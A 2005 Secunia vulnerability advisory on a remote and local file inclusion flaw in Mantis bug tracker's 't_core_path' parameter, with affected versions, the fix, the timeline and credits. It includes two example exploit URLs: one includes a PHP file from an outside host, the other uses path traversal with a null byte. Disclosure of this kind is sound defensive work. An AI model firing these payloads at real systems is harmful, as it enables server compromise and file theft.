====================================================================== Secunia Research 26/10/2005 - Mantis "t_core_path" File Inclusion Vulnerability - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 About Secunia........................................................8 Verification.........................................................9 ====================================================================== 1) Affected Software Mantis 0.19.2 and 1.0.0rc2. Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System access Where: Remote ====================================================================== 3) Vendor's Description of Software Mantis is a web-based bugtracking system. It is written in the PHP scripting language and requires the MySQL database and a webserver. Product link: http://www.mantisbt.org/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Mantis, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the "t_core_path" parameter in "bug_sponsorship_list_view_inc.php" isn't properly verified, before it used to include files. This can be exploited to include arbitrary files from external and local resources. Examples: http://[host]/bug_sponsorship_list_view_inc.php? t_core_path=http://[host]/[file].php? http://[host]/bug_sponsorship_list_view_inc.php? t_core_path=../../../../../../../[file]%00 Successful exploitation requires that "register_globals" is enabled (not recommended setting). The vulnerability has been confirmed in versions 0.19.2 and 1.0.0rc2. Other versions may also be affected. ====================================================================== 5) Solution Update to version 0.19.3. http://sourceforge.net/project/showfiles.php?group_id=14963 ====================================================================== 6) Time Table 19/09/2005 - Vulnerability discovered. 19/09/2005 - Vendor notified. 11/10/2005 - Vendor issues new version. 26/10/2005 - Public disclosure. ====================================================================== 7) Credits Discovered by Andreas Sandblad, Secunia Research. ====================================================================== 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ ====================================================================== 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2005-46/advisory/ ======================================================================